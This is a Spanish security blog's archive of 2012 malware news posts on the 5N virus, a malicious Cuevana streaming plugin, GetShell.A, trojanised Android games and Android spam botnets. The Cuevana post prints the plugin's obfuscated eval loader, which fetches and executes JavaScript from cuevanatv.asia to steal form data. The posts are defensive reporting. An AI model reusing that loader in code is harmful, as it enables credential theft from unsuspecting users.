Archivo

Posts Tagged ‘Malware’

Malware 5N (5 de Noviembre)

noviembre 9, 2012 Los comentarios están cerrados

Un nuevo malware apodado como “5N”, podría llevar a cabo acciones dañinas en los equipos infectados para, entre otras cosas, recopilar información o impedir su utilización a partir del 5 de Noviembre.

Para detectar si un equipo se encuentra infectado para un usuario concreto, bastaría con iniciar sesión con el mismo usuario y pulsar las teclas “Shift” + “Ctrl” + “Alt” + “F7” y comprobar si aparece una ventana que solicita contraseña. Dicha ventana es invocada por el propio virus y permite introducir una contraseña para detener las acciones del mismo en el sistema. En el caso de introducir una contraseña incorrecta 3 veces procede a apagar el equipo.

Por tanto, si se mostrara dicha ventana a la hora de pulsar la combinación de teclas descrita anteriormente, serían síntomas de infección.
Otra opción para detectar si su equipo está infectado es iniciar la utilidad de símbolo del sistema a (Inicio > Ejecutar > cmd) y ejecutar los siguientes comandos :

  • dir %SystemDrive%\ /a /b /s | findstr -i drmvclt.exe
  • dir D:\ /a /b /s | findstr -i drmvclt.exe

El segundo comando habrá que ejecutarlo en el caso de que el ordenador tenga más de una unidad: D:\, E:\, F:\, etc. Habría que cambiar la letra D:\ por la que corresponda.

En el caso de mostrar alguna salida los comandos anteriores, las cuales se corresponderían con las rutas en el sistema donde se encuentra almacenado el virus drmvclt.exe, se deberán anotar las mismas para posteriormente proceder a su eliminación.

Para desinfectar el equipo y los posibles dispositivos extraibles infectados, consulte la entrada correspondiente al virus 5N dentro de la base de datos de Virus de INTECO-CERT.

Fuente: INTECO

Categorías:Malware, Noticias Etiquetas: ,

¿El plug-in de Cuevana roba información financiera?

septiembre 17, 2012 Deja un comentario
Actualización: es probable que el script del plugin haya sido modificado por un tercero, ajeno a Cuevana. Lee el post hasta el final.

Cuevana, la conocida web de visionado online usada por varios millones de personas ha sido reportada como una web de “phising” (robo de datos sensibles) al detectar que el plugin que utiliza para supuestamente hacer streaming de los contenidos, contiene código malicioso utilizado para robar tus datos de redes sociales como Facebook e incluso de sitios de banca online como Banco Santander, Paypal y otros servicios de pago generalmente latinoamericanos.

Al parecer, al intentar visionar contenido de su sitio, este pide autorización para instalar un complemento (plugin) para tu navegador (tanto Firefox como Chrome). Este complemento aparentemente inofensivo resulta tener escondido en su código un script que contacta con el sitio web hxxp://cuevanatv.asia que contiene codigos en JavaScript para efectuar el robo de tus datos personales cada vez que rellenas un formulario en un sitio de confianza.

Se recomienda encarecidamente a todas las personas que alguna vez hayan visitado este conocido portal de streaming que revisen sus navegadores y eliminen el plugin “Cuevana Streaming”. Después de este procedimiento es obligatorio cambiar todas tus claves que hayan podido ser interceptadas por este script malicioso.

Si deseas investigar el plugin, solo necesitas descargarlo desde hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi y extraerlo con un descompresor de archivos (WinRar, 7Zip, etc.), despues abre el archivo “script-compiler.js” que encontrarás en la carpeta “content”. Una vez abierto ese archivo observa la linea número 232.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.split('|'),0,{}))

Actualización 19:00: confirmado, en Firefox, cualquier versión, está infectado con el código malicioso que roba datos. También estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios.

Actualización 19.30: descomprimir el XPI con WinRar (hxxp://www.cuevana.tv/player/plugins/cstream-4.2.xpi) (NO LO INSTALE).

Entrar en la carpeta “content” y mirar la linea 232 del archivo “script-compiler.js”. La url maliciosa es hxxp://cuevanatv.asia/back3.js.

Actualización 19.50:  han cambiado al código fuente del plugin. El plugin original para analizarlo se encuentra aquí.

Actualización 19.57: el nuevo plugin (diferente pero con la misma versión para que no se sospeche ) ya no roba datos. En el Tamper Data ya no da el aviso que daba antes. Han borrado la línea maliciosa del código para ocultar las pruebas. En el hilo de Foro Coches se puede encontrar el fichero original con el código malicioso, como prueba. Esto quiere decir que han borrado u ocultado la parte del código maliciosa.

Actualización 21:00: he analizado el código fuente de la versión 4.2 instalado en mi propia computadora hace tiempo (más de un mes) y la misma versión 4.2 modificada y efectivamente se observa la diferencia en el código fuente. A continuación dejo los dos fuentes:

Versión instalada hace un mes
Versión modificada

En Windows Vista o superior, el plugin lo puedes encontrar en: C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\\

La diferencia en el código podría indicar que:

El tiempo dirá.

Actualización 21:50: Cuevana está investigando el tema y recomienda desinstalar el plugin, e instalarlo nuevamente. Además se deben cambiar todas las contraseñas.

Fuente: Foro Coches y Galacticow Segu-Info

 

Categorías:Malware, Noticias Etiquetas: , ,

Pueden espiar todo lo que haces en Internet

septiembre 5, 2012 Deja un comentario

¿Conoces todos los riesgos que corres al compartir información personal o ingresar tus datos en la web? Un experto explica cómo puedes protegerte

 

 

“El problema de la seguridad en Internet tiene dos grandes factores. El externo, que son los delincuentes informáticos que quieren todo el tiempo penetrar en tu computadora y robar tus datos. Y el interno, que es el más grave: la ignorancia del usuario al navegar por Internet”, afirmó el argentino Miguel Sumer Elías, abogado especializado en derecho informático, en diálogo con Infobae América.

 

 

Más conectados, más desprotegidos

 

Con la generalización del acceso a la web y la proliferación de las redes sociales y de los servicios de trámites online, las personas ingresan en sus computadoras conectadas todo tipo de información sensible. Fotos, videos, direcciones, teléfonos, contraseñas bancarias y muchas otras cosas dejaron de quedar circunscriptas al hogar.

 

La gente no está siendo educada para vivir en esta realidad -contó Elías. El usuario hace click en cualquier cosa, descarga cualquier archivo, sube cualquier imagen y publica cualquier dato personal. También agrega gente indiscriminadamente en Facebook y le comparte lo mismo que a sus mejores amigos. Se le da al mundo entero información sobre cuestiones muy íntimas y eso es muy grave”.

 

Una muestra del desconocimiento que tienen los usuarios es que suelen confundir cuáles son los verdaderos riesgos. Esto se ve en el temor a que la PC sea contagiada por un virus.

 

El concepto de virus es viejo, pertenece a los ochenta y noventa. Antes era muy común escuchar que a alguien le había entrado un virus en la computadora y le había borrado todo. Eso ahora no pasa. El problema es el malware, que es software malicioso. Son programas de computación que infectan las computadoras, de los cuales sólo el 2 por ciento son virus”.

 

“La diferencia es que el virus es vandálico, te borra todos los archivos. Mientras que programas como los troyanos no te impiden usar la PC, pero te espían todo lo que haces. Entonces, las personas están tranquilas porque sus computadoras no tienen virus, pero no se dan cuenta de que están totalmente infectadas”, precisó Elías.

 

Por ejemplo, la posibilidad de hacer trámites bancarios online acortó los tiempos, ya que evita ir al banco en muchos casos. Pero eso no significa que uno puede conectarse y consultar su saldo o realizar una transferencia desde cualquier lugar.

 

“Las PC de los cibercafés está 100 por ciento contaminadas con troyanos. Si uno ingresa la clave de su homebanking allí, está firmando que la obtenga otra persona”.

 

 

De los conflictos reales a los conflictos digitales

 

Más allá del daño que puedan causar los delincuentes informáticos, pendientes de los descuidos para aprovecharse, hay otro universo de problemas relacionados con la información personal que navega en la red.

 

Con el uso masivo de las redes sociales, las personas comparten voluntariamente mucha información, sin darse cuenta de que eso puede ser usado en su contra.

 

De hecho, Elías contó cuáles son las principales consultas que recibe como abogado, y no es el robo informático lo que más aparece.

 

“Los conflictos en el mundo físico se trasladaron al mundo digital, y se potenciaron. Por ejemplo, en otra época, si un cónyuge engañaba a otro, el damnificado lo insultaba reunido con sus amigos. Hoy, el despechado arma un sitio web o comparte fotos en Facebook con información negativa y fotos privadas de su ex, y así destruye su reputación”.

 

Para enterarte de los riesgos que tiene el uso de la web y de cómo puedes protegerte, no te pierdas el próximo jueves 6 de septiembre la entrevista en vivo con Miguel Sumer Elías y el abogado mexicano Joel Gómez a través de América Directo (a las 11:30 hora Buenos Aires, 10.30 de Caracas y 9.30 de México DF). Envíales tus preguntas ingresando aquí.

 

Fuente: Infobae

 

 

Malware afecta a Macs que ejecutan “viejas” versiones de OS X

agosto 28, 2012 Deja un comentario

El programa malicioso conocido como GetShell.A, requiere que se apruebe la instalación de un applet de Java. OS X, pero el sistema operativo advierte que se trata de un certificado raíz que “no es de confianza”.

Si aún así el usuario decide seguir adelante e instalar este applet, el dispositivo se infectará.

Según los analistas, lo “fascinante” del malware es que es multiplataforma, ya que una vez que se permite la instalación del applet, descarga un código específico de plataforma para Mac OS X, Linux y Windows y así intentar abrir una puerta trasera en el equipo.

Aquí está lo interesante – el código de OS X no se ejecutará sin Rosetta en una plataforma basada en Intel, ya que es un binario PowerPC.

Esto significa que cualquier Mac sin Rosetta, básicamente cualquier máquina que tenga Lion o Mountain Lion, es inmune al malware.

Más detalles en: Inteldig

Google Play albergaba malware oculto en aplicaciones de juegos

agosto 28, 2012 Deja un comentario

Se trata de dos aplicaciones que se hacían pasar por versiones de GTA III y Super Mario Bros. para Android, pero que en realidad escondían un troyano que permitía el envío de SMS sin autorización del usuario.

Ambas aplicaciones estuvieron presentes cerca de dos semanas en la tienda de Google, siendo descargadas cerca de 100.000 veces, según lo señalado por un investigador de Symantec, quien descubrió el troyano en una versión de GTA III Moscow City y Super Mario Bros.

Con esto, los hackers se aseguraban que los juegos fueran ampliamente descargados, los que en realidad contenían un malware llamado Android.Dropdialer, que una vez instalado se conectaba a Dropbox y descargaba otro troyano, de nombre Activator.apk.

Tras completarse el proceso de instalación, los hackers lograban que los dispositivos infectados mandasen SMS de tarificación especial sin conocimiento de sus dueños, con el consiguiente rédito económico.

Los problemas de malware y virus en el sistema operativo móvil de Google y en su tienda de aplicaciones siguen a la orden del día, puesto que la compañía cuenta con criterios de verificación de plataformas más flexibles que otros sistemas como iOS, lo que hace que el peligro de ser infectado este latente incluso en su tienda oficial.

Más detalles en: Symantec

Categorías:Malware, Mobiles, Noticias Etiquetas: , , ,

El nuevo malware de Android se llama spam Botnet

agosto 27, 2012 Deja un comentario

Los mensajes de software malicioso se distribuyen a través del correo de Yahoo y promueven las falsificaciones de fármacos como la viagra, los expertos en seguridad aconsejan no descargar aplicaciones procedentes de desconocidos y fuera de las tiendas oficiales.

Expertos en seguridad de la compañía Sophos han descubierto nuevos ataques de malware en la plataforma Android camuflados en mensajes que promueven la falsificación de diversos fármacos como la viagra. Los mensajes de spam Botnet se envían sobre todo a tablets y a smartphones con Android. Los investigadores también advierten sobre el peligro de los mensajes sobre anuncios de banca online y las falsas notificaciones de subidas de tarifas de SMS.

Por otro lado, la fuente de ésta propagación de malware parecen ser los usuarios que descargan copias piratas de las aplicaciones para Android que han sido infectadas previamente con troyanos, según el asesor de seguridad para Canadá de Sophos, Chester Wisniewski.

Asimismo, algunos mensajes de malware contienen solo texto mientras que otros incorporan gráficas.

Hasta el momento, la empresa de seguridad ha analizado muestras del spam Botnet procedentes de Argentina, Ucrania, Pakistán, Jordania y Rusia. No obstante, el malware no parece proceder de descargas procedentes de la tienda de aplicaciones de Google.

Wisniewski aconseja a los usuarios de Android ‘precaución al descargar aplicaciones para sus dispositivos, así como evitar la descarga de aplicaciones falsas procedentes de fuentes no oficales, ya que Google, Amazon y otros no son infalibles a la hora de mantener el malware fuera de sus tiendas, pero el riesgo aumenta drásticamente fuera de sus ecosistemas’.

La firma de seguridad Symantec ha revelado que la mayor parte de la distribución de malware se encuentra en Android, con más de la mitad de las amenazas.

Fuente: idg

Categorías:Malware, Mobiles, Noticias Etiquetas: , ,

Botnets: El problema del malware en Android se agrava

agosto 27, 2012 Deja un comentario

El malware es un tema que lamentablemente cada vez más frecuente al hablar de smartphones e Internet móvil.

Hasta ahora una de las consecuencias más perniciosas de este problema son las botnets; una botnet es una red para enviar emails spam a través de computadoras infectadas por malware. Estas computadoras son controladas via remota por el creador del malware, que vende sus servicios a compañías o personas que usan estos mensajes para estafar incautos.

Las computadoras infectadas ocupan cantidades enormes de ancho de banda para enviar estos mensajes, además de que no pueden realizar sus tareas legítimás adecuadamente por estar ocupando recursos en enviar estos mensajes spam. Es un problema grave, que tiene serias repercusiones económicas de manera indirecta. Hasta ahora este problema solo se había presentado en PCs de escritorio o laptops.

Pero la situación acaba de cambiar drásticamente.

Terry Zink, un investigador de este fenómeno, mostró evidencia de que ya existen botnets compuestas enteramente por dispositivos Android para distribuir correos spam. Los correos usualmente anuncian medicinas como Viagra u otros medicamentos de receta.

Estos correos spam están siendo enviados a través del servicio de correo Yahoo. Ha sido posible saber incluso de qué paises provienen estos mensajes y la lista es digna de mención:

  • Chile
  • Indonesia
  • Líbano
  • Oman
  • Filipinas
  • Rusia
  • Arabia Saudita
  • Tailandia
  • Ucrania
  • Venezuela

La causa del problema se atribuye a descargar aplicaciones fuera de Google Play. Google monitorea estrechamente todas las aplicaciones que se ubican en su tienda y el índice de problemas se ha reducido en gran medida, pero descargar aplicaciones fuera de ella conlleva (aseguran) un gran riesgo ya que muchas pueden ser aplicaciones falsas o que contengan troyanos que pongan en riesgo el equipo. Probablemente los usuarios intentaron bajar una “versión gratis” de alguna aplicación popular o fueron engañados con una versión falsa de Yahoo mail.

Sea cual sea el caso, los problemas para los afectados son serios, ya que el envío de estos mensajes puede agotar rápidamente nuestro plan de datos y generar gastos extras considerables o simplemente impedir el funcionamiento correcto de nuestro smartphone. Sin duda la situación del malware en dispositivos móviles acaba de entrar en una nueva y más problemática etapa. Ya hemos platicado de las medidas que se pueden tomar en contra de este tipo de problemas. Es desafortunado que cada vez el uso de estas aplicaciones de seguridad sea más necesario. En este caso los dispositivos Android están siendo víctimas de su éxito y popularidad. Tengan la certeza de que esto no será lo último que escuchemos acerca de este problema.

Fuente: conozcasucelular